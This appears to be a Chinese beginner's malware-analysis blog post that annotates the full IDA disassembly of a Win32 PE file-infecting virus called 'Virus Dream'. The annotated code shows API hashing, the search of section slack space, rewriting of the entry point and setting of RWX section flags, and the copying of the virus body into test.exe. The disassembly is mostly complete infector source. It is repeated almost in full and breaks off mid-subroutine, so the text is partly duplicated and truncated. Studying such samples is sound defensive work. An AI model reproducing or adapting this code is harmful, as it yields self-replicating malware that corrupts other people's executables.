菜鸟的病毒分析6搜寻节空间感染pe
win32 搜寻节间隙感染pe文件
经过上次那个变形pe头病毒的洗礼,分析这个终于不那么蛋疼了
病毒行为:感染目录下的txt.exe文件 在原程序运行前运行病毒代码 弹出被感染对话框 继续感染其他病毒
流程:搜索api 打开文件 内存映射 搜索每一个节 查看节剩余空间能否插入病毒 如果能 更改相关属性 添加病毒 写文件 关闭文件 完成
.text:00401000 ;
.text:00401000 ; +-------------------------------------------------------------------------+
.text:00401000 ; | This file is generated by The Interactive Disassembler (IDA) |
.text:00401000 ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
.text:00401000 ; | Licensed to: Mach EDV Dienstleistungen, Jan Mach, 1 user, adv, 11/2007 |
.text:00401000 ; +-------------------------------------------------------------------------+
.text:00401000 ;
.text:00401000 ; Input MD5 : 9EB617432AAA47BAFA7437B8C58ABB25
.text:00401000
.text:00401000 ; ---------------------------------------------------------------------------
.text:00401000 ; File Name : C:\27405\Virus_Dream\Virus_Dream.exe
.text:00401000 ; Format : Portable executable for 80386 (PE)
.text:00401000 ; Imagebase : 400000
.text:00401000 ; Section 1. (virtual address 00001000)
.text:00401000 ; Virtual size : 00000292 ( 658.)
.text:00401000 ; Section size in file : 00000400 ( 1024.)
.text:00401000 ; Offset to raw data for section: 00000200
.text:00401000 ; Flags E0000020: Text Executable Readable Writable
.text:00401000 ; Alignment : default
.text:00401000
.text:00401000 .686p
.text:00401000 .mmx
.text:00401000 .model flat
.text:00401000
.text:00401000 ; ===========================================================================
.text:00401000
.text:00401000 ; Segment type: Pure code
.text:00401000 ; Segment permissions: Read/Write/Execute
.text:00401000 _text segment para public 'CODE' use32
.text:00401000 assume cs:_text
.text:00401000 ;org 401000h
.text:00401000 assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
.text:00401000
.text:00401000 public start
.text:00401000 start:
.text:00401000 pusha
.text:00401001 call sub_401091 ;跳到程序主体
.text:00401006
.text:00401006 loc_401006: ; DATA XREF: sub_401091+24o
.text:00401006 jp short near ptr gloaballoc
.text:00401008 mov byte ptr [eax], 0
.text:00401008 ; ---------------------------------------------------------------------------
;;;;;这里是病毒所需要搜索的api
.text:0040100B creatfile dw 0
.text:0040100D db 0
.text:0040100E db 0E7h ; ?
.text:0040100F db 0EFh ; ?
.text:00401010 db 54h ; T
.text:00401011 db 95h ; ?
.text:00401012 getfilesize db 0
.text:00401013 db 0
.text:00401014 db 0
.text:00401015 db 0
.text:00401016 db 45h ; E
.text:00401017 db 55h ; U
.text:00401018 db 0E2h ; ?
.text:00401019 db 0Bh
.text:0040101A readfile db 0
.text:0040101B db 0
.text:0040101C db 0
.text:0040101D db 0
.text:0040101E db 70h ; p
.text:0040101F db 0FDh ; ?
.text:00401020 db 0D1h ; ?
.text:00401021 db 0A9h ; ?
.text:00401022 setfilepointer db 0
.text:00401023 db 0
.text:00401024 db 0
.text:00401025 db 0
.text:00401026 db 16h
.text:00401027 db 0D6h ; ?
.text:00401028 db 0D6h ; ?
.text:00401029 db 0C0h ; ?
.text:0040102A db 0
.text:0040102B db 0
.text:0040102C db 0
.text:0040102D db 0
.text:0040102E db 9
.text:0040102F db 0D0h ; ?
.text:00401030 db 0F6h, 0C2h
.text:00401032 gloaballoc dw 0 ; CODE XREF: .text:loc_401006j
.text:00401034 db 0
.text:00401035 db 0
.text:00401036 db 0CFh ; ?
.text:00401037 db 0D3h ; ?
.text:00401038 db 5Eh ; ^
.text:00401039 db 58h ; X
.text:0040103A gloabafree db 0
.text:0040103B db 0
.text:0040103C db 0
.text:0040103D db 0
.text:0040103E db 45h ; E
.text:0040103F db 0C5h ; ?
.text:00401040 db 0D8h ; ?
.text:00401041 db 58h ; X
.text:00401042 writefile db 0
.text:00401043 db 0
.text:00401044 db 0
.text:00401045 db 0
.text:00401046 db 89h ; ?
.text:00401047 db 0FDh ; ?
.text:00401048 db 12h
.text:00401049 db 0A4h ; ?
.text:0040104A loadlibraryA db 0
.text:0040104B db 0
.text:0040104C db 0
.text:0040104D db 0
.text:0040104E db 51h ; Q
.text:0040104F db 4Ch ; L
.text:00401050 db 0D1h ; ?
.text:00401051 db 14h
.text:00401052 messageboxa db 0
.text:00401053 db 0
.text:00401054 db 0
.text:00401055 db 0
.text:00401056 db 0
.text:00401057 db 0
.text:00401058 db 0
.text:00401059 align 2
.text:0040105A aVirusDreamDemo db 'Virus Dream - Demo',0
.text:0040106D aOhYeahOfVirusD db 'Oh Yeah of Virus Dream',0
.text:00401084 aTest_exe db 'test.exe',0
.text:0040108D align 10h
.text:00401090 db 0
.text:00401091
.text:00401091 ; =============== S U B R O U T I N E =======================================
.text:00401091
.text:00401091 ;;;;;;主体部分;;;;;;;;
.text:00401091 sub_401091 proc near ; CODE XREF: .text:00401001p
.text:00401091
.text:00401091 ; FUNCTION CHUNK AT .text:004011CB SIZE 00000006 BYTES
.text:00401091
.text:00401091 pop ebp
.text:00401092 call sub_40121F ; 查找kernel基址
.text:00401097 push ebp
.text:00401098 push eax
.text:00401099 call sub_401238 ; 查找api
.text:0040109E push 3233h
.text:004010A3 push 72657375h
.text:004010A8 push esp
.text:004010A9 call dword ptr [ebp+44h] ; loalibraryA
.text:004010AC pop edx
.text:004010AD pop edx
.text:004010AE push ebp
.text:004010AF push eax
.text:004010B0 call sub_401238 ; 获取user32中的api
.text:004010B5 cmp ebp, offset loc_401006
.text:004010BB jz short loc_4010DB ; 跳转到病毒感染部分
.text:004010BD push 0
.text:004010BF lea edx, [ebp+54h]
.text:004010C2 push edx
.text:004010C3 lea edx, [ebp+67h]
.text:004010C6 push edx
.text:004010C7 push 0
.text:004010C9 call dword ptr [ebp+4Ch] ; messagebox这里是病毒的发作体现
.text:004010CC lea eax, [ebp+7Eh]
.text:004010CF push eax
.text:004010D0 call sub_4010E6
.text:004010D5 popa
.text:004010D6 jmp baseimage
.text:004010DB ; ---------------------------------------------------------------------------
.text:004010DB ;;;;病毒感染部分;;;;;;;;
.text:004010DB loc_4010DB: ; CODE XREF: sub_401091+2Aj
.text:004010DB lea eax, [ebp+7Eh]
.text:004010DE push eax ; text.ext入栈
.text:004010DF call sub_4010E6
.text:004010E4 popa
.text:004010E5 retn
.text:004010E5 sub_401091 endp ; sp-analysis failed
.text:004010E5
.text:004010E6
.text:004010E6 ; =============== S U B R O U T I N E =======================================
.text:004010E6
.text:004010E6
.text:004010E6 sub_4010E6 proc near ; CODE XREF: sub_401091+3Fp
.text:004010E6 ; sub_401091+4Ep
.text:004010E6
.text:004010E6 var_28 = byte ptr -28h
.text:004010E6 var_14 = dword ptr -14h
.text:004010E6
.text:004010E6 pusha
.text:004010E7 lea edx, [esp+20h+var_28]
.text:004010EB call sub_4010F9
.text:004010F0 mov esp, [esp+1Ch+var_14]
.text:004010F4 jmp loc_4011C1
.text:004010F4 sub_4010E6 endp
.text:004010F4
.text:004010F9
.text:004010F9 ; =============== S U B R O U T I N E =======================================
.text:004010F9 ;;;;;病毒注入部分;;;;;;;;
.text:004010F9
.text:004010F9 sub_4010F9 proc near ; CODE XREF: sub_4010E6+5p
.text:004010F9
.text:004010F9 var_34 = dword ptr -34h
.text:004010F9 arg_24 = dword ptr 28h
.text:004010F9
.text:004010F9 sub eax, eax
.text:004010FB xchg edx, fs:[eax]
.text:004010FE push edx
.text:004010FF mov edx, [esp+4+arg_24]
.text:00401103 push eax
.text:00401104 push eax
.text:00401105 push 3
.text:00401107 push eax
.text:00401108 push 2
.text:0040110A push 0C0000000h
.text:0040110F push edx
.text:00401110 call dword ptr [ebp+4] ; 打开文件creatfile
.text:00401113 cmp eax, 0FFFFFFFFh
.text:00401116 jz loc_4011C1
.text:0040111C xchg eax, ebx ; ebx文件局柄
.text:0040111D push 0
.text:0040111F push ebx
.text:00401120 call dword ptr [ebp+0Ch] ; 获取文件大小
.text:00401123 push eax
.text:00401124 push eax
.text:00401125 push 40h
.text:00401127 call dword ptr [ebp+2Ch] ; 开辟内存
.text:0040112A xchg eax, edi
.text:0040112B push 0
.text:0040112D push esp
.text:0040112E push [esp+3Ch+var_34]
.text:00401132 push edi
.text:00401133 push ebx
.text:00401134 call dword ptr [ebp+14h] ; 读文件
.text:00401137 pop dword ptr [ebp+87h]
.text:0040113D push edi
.text:0040113E call checkifpe
.text:00401143 jnb short loc_4011B9
.text:00401145 push edi
.text:00401146 call sub_4011EE ; getsectiontable
.text:0040114B xchg eax, esi ; esi sectiontable
.text:0040114C push edi
.text:0040114D call sub_401211 ; 返回节的个数到ecx
.text:00401152 jecxz short loc_4011B9
.text:00401154
.text:00401154 checkifenoughforvirus: ; CODE XREF: sub_4010F9+6Cj;判断节剩余空间能否写入病毒
.text:00401154 mov edx, [esi+10h]
.text:00401157 sub edx, [esi+8]
.text:0040115A cmp edx, 292h
.text:00401160 jg short loc_401169
.text:00401162 add esi, 28h ; 40字节 这是在循环查找节
.text:00401165 loop checkifenoughforvirus
.text:00401167 jmp short loc_4011B9
.text:00401169 ; ---------------------------------------------------------------------------
.text:00401169
.text:00401169 loc_401169: ; CODE XREF: sub_4010F9+67j
.text:00401169 push edi
.text:0040116A call sub_401200 ; 返回基址到ecx
.text:0040116F mov [ebp+1C6h], eax
.text:00401175 mov edx, [esi+8]
.text:00401178 add edx, [esi+0Ch]
.text:0040117B mov eax, edi
.text:0040117D add eax, [edi+3Ch]
.text:00401180 mov [eax+28h], edx ; 修改入口地址
.text:00401183 or dword ptr [esi+24h], 0E0000020h ; 修改节属性为可读可写可执行
.text:0040118A mov edx, [esi+8]
.text:0040118D add edx, [esi+14h]
.text:00401190 add edx, edi
.text:00401192 pusha
.text:00401193 lea esi, [ebp-6]
.text:00401196 mov ecx, 292h
.text:0040119B mov edi, edx
.text:0040119D cld
.text:0040119E rep movsb ; 写入病毒这里是先写入内存可能后面会写入文件
.text:004011A0 popa
.text:004011A1 push 0
.text:004011A3 push 0
.text:004011A5 push 0
.text:004011A7 push ebx
.text:004011A8 call dword ptr [ebp+1Ch] ; 移动指针到文件头
.text:004011AB push 0
.text:004011AD push esp
.text:004011AE push dword ptr [ebp+87h]
.text:004011B4 push edi
.text:004011B5 push ebx
.text:004011B6 call dword ptr [ebp+3Ch] ; 写文件
.text:004011B9
.text:004011B9 loc_4011B9: ; CODE XREF: sub_4010F9+4Aj
.text:004011B9 ; sub_4010F9+59j ...
.text:004011B9 push ebx
.text:004011BA call dword ptr [ebp+24h] ; 关闭句柄
.text:004011BD push edi
.text:004011BE call dword ptr [ebp+34h] ; 释放内存
.text:004011C1
.text:004011C1 loc_4011C1: ; CODE XREF: sub_4010E6+Ej获取文件句柄
.text:004011C1 ; sub_4010F9+1Dj
.text:004011C1 sub eax, eax
.text:004011C3 pop dword ptr fs:[eax]
.text:004011C6 pop edx
.text:004011C7 popa
.text:004011C8 retn 4 ;;;;感染完成啦
.text:004011C8 sub_4010F9 endp ; sp-analysis failed
.text:004011C8
.text:004011CB ; ---------------------------------------------------------------------------
.text:004011CB ; START OF FUNCTION CHUNK FOR sub_401091
.text:004011CB
.text:004011CB baseimage: ; CODE XREF: sub_401091+45j
.text:004011CB ; sub_401091+13Fj
.text:004011CB ; DATA XREF: ...
.text:004011CB push offset baseimage
.text:004011D0 retn
.text:004011D0 ; END OF FUNCTION CHUNK FOR sub_401091
.text:004011D1
.text:004011D1 ; =============== S U B R O U T I N E =======================================
.text:004011D1
.text:004011D1
.text:004011D1 checkifpe proc near ; CODE XREF: sub_4010F9+45p;;;检查是不是pe文件
.text:004011D1
.text:004011D1 arg_0 = dword ptr 4
.text:004011D1
.text:004011D1 mov edx, [esp+arg_0]
.text:004011D5 cmp word ptr [edx], 'ZM'
.text:004011DA jnz short loc_4011EA
.text:004011DC add edx, [edx+3Ch]
.text:004011DF cmp word ptr [edx], 'EP'
.text:004011E4 jnz short loc_4011EA
.text:004011E6 stc
.text:004011E7 retn 4
.text:004011EA ; ---------------------------------------------------------------------------
.text:004011EA
.text:004011EA loc_4011EA: ; CODE XREF: checkifpe+9j
.text:004011EA ; checkifpe+13j
.text:004011EA clc
.text:004011EB retn 4
.text:004011EB checkifpe endp
.text:004011EB
.text:004011EE
.text:004011EE ; =============== S U B R O U T I N E =======================================
.text:004011EE;;;;;;;;;;;;;;;;;;;;;;;;;返回optionhead大小,为了转到setiontable
.text:004011EE
.text:004011EE sub_4011EE proc near ; CODE XREF: sub_4010F9+4Dp;
.text:004011EE
.text:004011EE arg_0 = dword ptr 4
.text:004011EE
.text:004011EE mov eax, [esp+arg_0]
.text:004011F2 add eax, [eax+3Ch]
.text:004011F5 movzx edx, word ptr [eax+14h] ; edx sizeofoptionhead
.text:004011F9 lea eax, [eax+edx+18h]
.text:004011FD retn 4
.text:004011FD sub_4011EE endp
.text:004011FD
.text:00401200
.text:00401200 ; =============== S U B R O U T I N E =======================================
.text:00401200
.text:00401200
.text:00401200 sub_401200 proc near ; CODE XREF: sub_4010F9+71p
.text:00401200
.text:00401200 arg_0 = dword ptr 4
.text:00401200
.text:00401200 mov eax, [esp+arg_0]
.text:00401204 add eax, [eax+3Ch]
.text:00401207 mov edx, [eax+28h]
.text:0040120A add edx, [eax+34h]
.text:0040120D xchg eax, edx
.text:0040120E retn 4
.text:0040120E sub_401200 endp
.text:0040120E
.text:00401211
.text:00401211 ; =============== S U B R O U T I N E =======================================
.text:00401211
.text:00401211
.text:00401211 sub_401211 proc near ; CODE XREF: sub_4010F9+54p返回节的个数
.text:00401211
.text:00401211 arg_0 = dword ptr 4
.text:00401211
.text:00401211 mov eax, [esp+arg_0]
.text:00401215 add eax, [eax+3Ch]
.text:00401218 movzx ecx, word ptr [eax+6]
.text:0040121C retn 4
.text:0040121C sub_401211 endp
.text:0040121C
.text:0040121F
.text:0040121F ; =============== S U B R O U T I N E =======================================
.text:0040121F
.text:0040121F
.text:0040121F sub_40121F proc near ; CODE XREF: sub_401091+1p
.text:0040121F push esi
.text:00401220 xor esi, esi
.text:00401222 mov esi, fs:[esi+18h]
.text:00401226 lodsd
.text:00401227 lodsd
.text:00401228 mov eax, [eax-1Ch]
.text:0040122B
.text:0040122B loc_40122B: ; CODE XREF: sub_40121F+15j
.text:0040122B dec eax
.text:0040122C xor ax, ax
.text:0040122F cmp word ptr [eax], 5A4Dh
.text:00401234 jnz short loc_40122B
.text:00401236 pop esi
.text:00401237 retn
.text:00401237 sub_40121F endp
.text:00401237
.text:00401238
.text:00401238 ; =============== S U B R O U T I N E =======================================
.text:00401238
.text:00401238
.text:00401238 sub_401238 proc near ; CODE XREF: sub_401091+8p 搜索api
.text:00401238 ; sub_401091+1Fp
.text:00401238
.text:00401238 var_24 = dword ptr -24h
.text:00401238 arg_0 = dword ptr 4
.text:00401238 arg_4 = dword ptr 8
.text:00401238
.text:00401238 pusha
.text:00401239 mov ebx, [esp+20h+arg_0]
.text:0040123D mov edx, [ebx+3Ch]
.text:00401240 mov esi, [ebx+edx+78h]
.text:00401244 lea esi, [esi+ebx+18h]
.text:00401248 lodsd
.text:00401249 xchg eax, ecx
.text:0040124A lodsd
.text:0040124B add eax, ebx
.text:0040124D xchg eax, ebp
.text:0040124E lodsd
.text:0040124F add eax, ebx
.text:00401251 xchg eax, edx
.text:00401252 lodsd
.text:00401253 add eax, ebx
.text:00401255 push eax
.text:00401256 mov esi, edx
.text:00401258
.text:00401258 loc_401258: ; CODE XREF: sub_401238:loc_40128Bj
.text:00401258 lodsd
.text:00401259 add eax, ebx
.text:0040125B xor edx, edx
.text:0040125D
.text:0040125D loc_40125D: ; CODE XREF: sub_401238+2Ej
.text:0040125D rol edx, 3
.text:00401260 xor dl, [eax]
.text:00401262 inc eax
.text:00401263 cmp byte ptr [eax], 0
.text:00401266 jnz short loc_40125D
.text:00401268 mov eax, [esp+24h+var_24]
.text:0040126B add [esp+24h+var_24], 2
.text:0040126F mov edi, [esp+24h+arg_4]
.text:00401273
.text:00401273 loc_401273: ; CODE XREF: sub_401238+51j
.text:00401273 cmp [edi], edx
.text:00401275 jnz short loc_401284
.text:00401277 movzx eax, word ptr [eax]
.text:0040127A mov eax, [ebp+eax*4+0]
.text:0040127E add eax, ebx
.text:00401280 scasd
.text:00401281 stosd
.text:00401282 jmp short loc_40128B
.text:00401284 ; ---------------------------------------------------------------------------
.text:00401284
.text:00401284 loc_401284: ; CODE XREF: sub_401238+3Dj
.text:00401284 scasd
.text:00401285 scasd
.text:00401286 cmp dword ptr [edi], 0
.text:00401289 jnz short loc_401273
.text:0040128B
.text:0040128B loc_40128B: ; CODE XREF: sub_401238+4Aj
.text:0040128B loop loc_401258
.text:0040128D pop ecx
.text:0040128E popa
.text:0040128F retn 8
.text:0040128F sub_401238 endp
.text:0040128F
.text:0040128F ; ---------------------------------------------------------------------------
.text:00401292 align 200h
.text:00401292 _text ends
.text:00401292
.text:00401292
.text:00401292 end start
经过上次那个变形pe头病毒的洗礼,分析这个终于不那么蛋疼了
病毒行为:感染目录下的txt.exe文件 在原程序运行前运行病毒代码 弹出被感染对话框 继续感染其他病毒
流程:搜索api 打开文件 内存映射 搜索每一个节 查看节剩余空间能否插入病毒 如果能 更改相关属性 添加病毒 写文件 关闭文件 完成
.text:00401000 ;
.text:00401000 ; +-------------------------------------------------------------------------+
.text:00401000 ; | This file is generated by The Interactive Disassembler (IDA) |
.text:00401000 ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
.text:00401000 ; | Licensed to: Mach EDV Dienstleistungen, Jan Mach, 1 user, adv, 11/2007 |
.text:00401000 ; +-------------------------------------------------------------------------+
.text:00401000 ;
.text:00401000 ; Input MD5 : 9EB617432AAA47BAFA7437B8C58ABB25
.text:00401000
.text:00401000 ; ---------------------------------------------------------------------------
.text:00401000 ; File Name : C:\27405\Virus_Dream\Virus_Dream.exe
.text:00401000 ; Format : Portable executable for 80386 (PE)
.text:00401000 ; Imagebase : 400000
.text:00401000 ; Section 1. (virtual address 00001000)
.text:00401000 ; Virtual size : 00000292 ( 658.)
.text:00401000 ; Section size in file : 00000400 ( 1024.)
.text:00401000 ; Offset to raw data for section: 00000200
.text:00401000 ; Flags E0000020: Text Executable Readable Writable
.text:00401000 ; Alignment : default
.text:00401000
.text:00401000 .686p
.text:00401000 .mmx
.text:00401000 .model flat
.text:00401000
.text:00401000 ; ===========================================================================
.text:00401000
.text:00401000 ; Segment type: Pure code
.text:00401000 ; Segment permissions: Read/Write/Execute
.text:00401000 _text segment para public 'CODE' use32
.text:00401000 assume cs:_text
.text:00401000 ;org 401000h
.text:00401000 assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
.text:00401000
.text:00401000 public start
.text:00401000 start:
.text:00401000 pusha
.text:00401001 call sub_401091 ;跳到程序主体
.text:00401006
.text:00401006 loc_401006: ; DATA XREF: sub_401091+24o
.text:00401006 jp short near ptr gloaballoc
.text:00401008 mov byte ptr [eax], 0
.text:00401008 ; ---------------------------------------------------------------------------
;;;;;这里是病毒所需要搜索的api
.text:0040100B creatfile dw 0
.text:0040100D db 0
.text:0040100E db 0E7h ; ?
.text:0040100F db 0EFh ; ?
.text:00401010 db 54h ; T
.text:00401011 db 95h ; ?
.text:00401012 getfilesize db 0
.text:00401013 db 0
.text:00401014 db 0
.text:00401015 db 0
.text:00401016 db 45h ; E
.text:00401017 db 55h ; U
.text:00401018 db 0E2h ; ?
.text:00401019 db 0Bh
.text:0040101A readfile db 0
.text:0040101B db 0
.text:0040101C db 0
.text:0040101D db 0
.text:0040101E db 70h ; p
.text:0040101F db 0FDh ; ?
.text:00401020 db 0D1h ; ?
.text:00401021 db 0A9h ; ?
.text:00401022 setfilepointer db 0
.text:00401023 db 0
.text:00401024 db 0
.text:00401025 db 0
.text:00401026 db 16h
.text:00401027 db 0D6h ; ?
.text:00401028 db 0D6h ; ?
.text:00401029 db 0C0h ; ?
.text:0040102A db 0
.text:0040102B db 0
.text:0040102C db 0
.text:0040102D db 0
.text:0040102E db 9
.text:0040102F db 0D0h ; ?
.text:00401030 db 0F6h, 0C2h
.text:00401032 gloaballoc dw 0 ; CODE XREF: .text:loc_401006j
.text:00401034 db 0
.text:00401035 db 0
.text:00401036 db 0CFh ; ?
.text:00401037 db 0D3h ; ?
.text:00401038 db 5Eh ; ^
.text:00401039 db 58h ; X
.text:0040103A gloabafree db 0
.text:0040103B db 0
.text:0040103C db 0
.text:0040103D db 0
.text:0040103E db 45h ; E
.text:0040103F db 0C5h ; ?
.text:00401040 db 0D8h ; ?
.text:00401041 db 58h ; X
.text:00401042 writefile db 0
.text:00401043 db 0
.text:00401044 db 0
.text:00401045 db 0
.text:00401046 db 89h ; ?
.text:00401047 db 0FDh ; ?
.text:00401048 db 12h
.text:00401049 db 0A4h ; ?
.text:0040104A loadlibraryA db 0
.text:0040104B db 0
.text:0040104C db 0
.text:0040104D db 0
.text:0040104E db 51h ; Q
.text:0040104F db 4Ch ; L
.text:00401050 db 0D1h ; ?
.text:00401051 db 14h
.text:00401052 messageboxa db 0
.text:00401053 db 0
.text:00401054 db 0
.text:00401055 db 0
.text:00401056 db 0
.text:00401057 db 0
.text:00401058 db 0
.text:00401059 align 2
.text:0040105A aVirusDreamDemo db 'Virus Dream - Demo',0
.text:0040106D aOhYeahOfVirusD db 'Oh Yeah of Virus Dream',0
.text:00401084 aTest_exe db 'test.exe',0
.text:0040108D align 10h
.text:00401090 db 0
.text:00401091
.text:00401091 ; =============== S U B R O U T I N E =======================================
.text:00401091
.text:00401091 ;;;;;;主体部分;;;;;;;;
.text:00401091 sub_401091 proc near ; CODE XREF: .text:00401001p
.text:00401091
.text:00401091 ; FUNCTION CHUNK AT .text:004011CB SIZE 00000006 BYTES
.text:00401091
.text:00401091 pop ebp
.text:00401092 call sub_40121F ; 查找kernel基址
.text:00401097 push ebp
.text:00401098 push eax
.text:00401099 call sub_401238 ; 查找api
.text:0040109E push 3233h
.text:004010A3 push 72657375h
.text:004010A8 push esp
.text:004010A9 call dword ptr [ebp+44h] ; loalibraryA
.text:004010AC pop edx
.text:004010AD pop edx
.text:004010AE push ebp
.text:004010AF push eax
.text:004010B0 call sub_401238 ; 获取user32中的api
.text:004010B5 cmp ebp, offset loc_401006
.text:004010BB jz short loc_4010DB ; 跳转到病毒感染部分
.text:004010BD push 0
.text:004010BF lea edx, [ebp+54h]
.text:004010C2 push edx
.text:004010C3 lea edx, [ebp+67h]
.text:004010C6 push edx
.text:004010C7 push 0
.text:004010C9 call dword ptr [ebp+4Ch] ; messagebox这里是病毒的发作体现
.text:004010CC lea eax, [ebp+7Eh]
.text:004010CF push eax
.text:004010D0 call sub_4010E6
.text:004010D5 popa
.text:004010D6 jmp baseimage
.text:004010DB ; ---------------------------------------------------------------------------
.text:004010DB ;;;;病毒感染部分;;;;;;;;
.text:004010DB loc_4010DB: ; CODE XREF: sub_401091+2Aj
.text:004010DB lea eax, [ebp+7Eh]
.text:004010DE push eax ; text.ext入栈
.text:004010DF call sub_4010E6
.text:004010E4 popa
.text:004010E5 retn
.text:004010E5 sub_401091 endp ; sp-analysis failed
.text:004010E5
.text:004010E6
.text:004010E6 ; =============== S U B R O U T I N E =======================================
.text:004010E6
.text:004010E6
.text:004010E6 sub_4010E6 proc near ; CODE XREF: sub_401091+3Fp
.text:004010E6 ; sub_401091+4Ep
.text:004010E6
.text:004010E6 var_28 = byte ptr -28h
.text:004010E6 var_14 = dword ptr -14h
.text:004010E6
.text:004010E6 pusha
.text:004010E7 lea edx, [esp+20h+var_28]
.text:004010EB call sub_4010F9
.text:004010F0 mov esp, [esp+1Ch+var_14]
.text:004010F4 jmp loc_4011C1
.text:004010F4 sub_4010E6 endp
.text:004010F4
.text:004010F9
.text:004010F9 ; =============== S U B R O U T I N E =======================================
.text:004010F9 ;;;;;病毒注入部分;;;;;;;;
.text:004010F9
.text:004010F9 sub_4010F9 proc near ; CODE XREF: sub_4010E6+5p
.text:004010F9
.text:004010F9 var_34 = dword ptr -34h
.text:004010F9 arg_24 = dword ptr 28h
.text:004010F9
.text:004010F9 sub eax, eax
.text:004010FB xchg edx, fs:[eax]
.text:004010FE push edx
.text:004010FF mov edx, [esp+4+arg_24]
.text:00401103 push eax
.text:00401104 push eax
.text:00401105 push 3
.text:00401107 push eax
.text:00401108 push 2
.text:0040110A push 0C0000000h
.text:0040110F push edx
.text:00401110 call dword ptr [ebp+4] ; 打开文件creatfile
.text:00401113 cmp eax, 0FFFFFFFFh
.text:00401116 jz loc_4011C1
.text:0040111C xchg eax, ebx ; ebx文件局柄
.text:0040111D push 0
.text:0040111F push ebx
.text:00401120 call dword ptr [ebp+0Ch] ; 获取文件大小
.text:00401123 push eax
.text:00401124 push eax
.text:00401125 push 40h
.text:00401127 call dword ptr [ebp+2Ch] ; 开辟内存
.text:0040112A xchg eax, edi
.text:0040112B push 0
.text:0040112D push esp
.text:0040112E push [esp+3Ch+var_34]
.text:00401132 push edi
.text:00401133 push ebx
.text:00401134 call dword ptr [ebp+14h] ; 读文件
.text:00401137 pop dword ptr [ebp+87h]
.text:0040113D push edi
.text:0040113E call checkifpe
.text:00401143 jnb short loc_4011B9
.text:00401145 push edi
.text:00401146 call sub_4011EE ; getsectiontable
.text:0040114B xchg eax, esi ; esi sectiontable
.text:0040114C push edi
.text:0040114D call sub_401211 ; 返回节的个数到ecx
.text:00401152 jecxz short loc_4011B9
.text:00401154
.text:00401154 checkifenoughforvirus: ; CODE XREF: sub_4010F9+6Cj;判断节剩余空间能否写入病毒
.text:00401154 mov edx, [esi+10h]
.text:00401157 sub edx, [esi+8]
.text:0040115A cmp edx, 292h
.text:00401160 jg short loc_401169
.text:00401162 add esi, 28h ; 40字节 这是在循环查找节
.text:00401165 loop checkifenoughforvirus
.text:00401167 jmp short loc_4011B9
.text:00401169 ; ---------------------------------------------------------------------------
.text:00401169
.text:00401169 loc_401169: ; CODE XREF: sub_4010F9+67j
.text:00401169 push edi
.text:0040116A call sub_401200 ; 返回基址到ecx
.text:0040116F mov [ebp+1C6h], eax
.text:00401175 mov edx, [esi+8]
.text:00401178 add edx, [esi+0Ch]
.text:0040117B mov eax, edi
.text:0040117D add eax, [edi+3Ch]
.text:00401180 mov [eax+28h], edx ; 修改入口地址
.text:00401183 or dword ptr [esi+24h], 0E0000020h ; 修改节属性为可读可写可执行
.text:0040118A mov edx, [esi+8]
.text:0040118D add edx, [esi+14h]
.text:00401190 add edx, edi
.text:00401192 pusha
.text:00401193 lea esi, [ebp-6]
.text:00401196 mov ecx, 292h
.text:0040119B mov edi, edx
.text:0040119D cld
.text:0040119E rep movsb ; 写入病毒这里是先写入内存可能后面会写入文件
.text:004011A0 popa
.text:004011A1 push 0
.text:004011A3 push 0
.text:004011A5 push 0
.text:004011A7 push ebx
.text:004011A8 call dword ptr [ebp+1Ch] ; 移动指针到文件头
.text:004011AB push 0
.text:004011AD push esp
.text:004011AE push dword ptr [ebp+87h]
.text:004011B4 push edi
.text:004011B5 push ebx
.text:004011B6 call dword ptr [ebp+3Ch] ; 写文件
.text:004011B9
.text:004011B9 loc_4011B9: ; CODE XREF: sub_4010F9+4Aj
.text:004011B9 ; sub_4010F9+59j ...
.text:004011B9 push ebx
.text:004011BA call dword ptr [ebp+24h] ; 关闭句柄
.text:004011BD push edi
.text:004011BE call dword ptr [ebp+34h] ; 释放内存
.text:004011C1
.text:004011C1 loc_4011C1: ; CODE XREF: sub_4010E6+Ej获取文件句柄
.text:004011C1 ; sub_4010F9+1Dj
.text:004011C1 sub eax, eax
.text:004011C3 pop dword ptr fs:[eax]
.text:004011C6 pop edx
.text:004011C7 popa
.text:004011C8 retn 4 ;;;;感染完成啦
.text:004011C8 sub_4010F9 endp ; sp-analysis failed
.text:004011C8
.text:004011CB ; ---------------------------------------------------------------------------
.text:004011CB ; START OF FUNCTION CHUNK FOR sub_401091
.text:004011CB
.text:004011CB baseimage: ; CODE XREF: sub_401091+45j
.text:004011CB ; sub_401091+13Fj
.text:004011CB ; DATA XREF: ...
.text:004011CB push offset baseimage
.text:004011D0 retn
.text:004011D0 ; END OF FUNCTION CHUNK FOR sub_401091
.text:004011D1
.text:004011D1 ; =============== S U B R O U T I N E =======================================
.text:004011D1
.text:004011D1
.text:004011D1 checkifpe proc near ; CODE XREF: sub_4010F9+45p;;;检查是不是pe文件
.text:004011D1
.text:004011D1 arg_0 = dword ptr 4
.text:004011D1
.text:004011D1 mov edx, [esp+arg_0]
.text:004011D5 cmp word ptr [edx], 'ZM'
.text:004011DA jnz short loc_4011EA
.text:004011DC add edx, [edx+3Ch]
.text:004011DF cmp word ptr [edx], 'EP'
.text:004011E4 jnz short loc_4011EA
.text:004011E6 stc
.text:004011E7 retn 4
.text:004011EA ; ---------------------------------------------------------------------------
.text:004011EA
.text:004011EA loc_4011EA: ; CODE XREF: checkifpe+9j
.text:004011EA ; checkifpe+13j
.text:004011EA clc
.text:004011EB retn 4
.text:004011EB checkifpe endp
.text:004011EB
.text:004011EE
.text:004011EE ; =============== S U B R O U T I N E =======================================
.text:004011EE;;;;;;;;;;;;;;;;;;;;;;;;;返回optionhead大小,为了转到setiontable
.text:004011EE
.text:004011EE sub_4011EE proc near ; CODE XREF: sub_4010F9+4Dp;
.text:004011EE
.text:004011EE arg_0 = dword ptr 4
.text:004011EE
.text:004011EE mov eax, [esp+arg_0]
.text:004011F2 add eax, [eax+3Ch]
.text:004011F5 movzx edx, word ptr [eax+14h] ; edx sizeofoptionhead
.text:004011F9 lea eax, [eax+edx+18h]
.text:004011FD retn 4
.text:004011FD sub_4011EE endp
.text:004011FD
.text:00401200
.text:00401200 ; =============== S U B R O U T I N E =======================================
.text:00401200
.text:00401200
.text:00401200 sub_401200 proc near ; CODE XREF: sub_4010F9+71p
.text:00401200
.text:00401200 arg_0 = dword ptr 4
.text:00401200
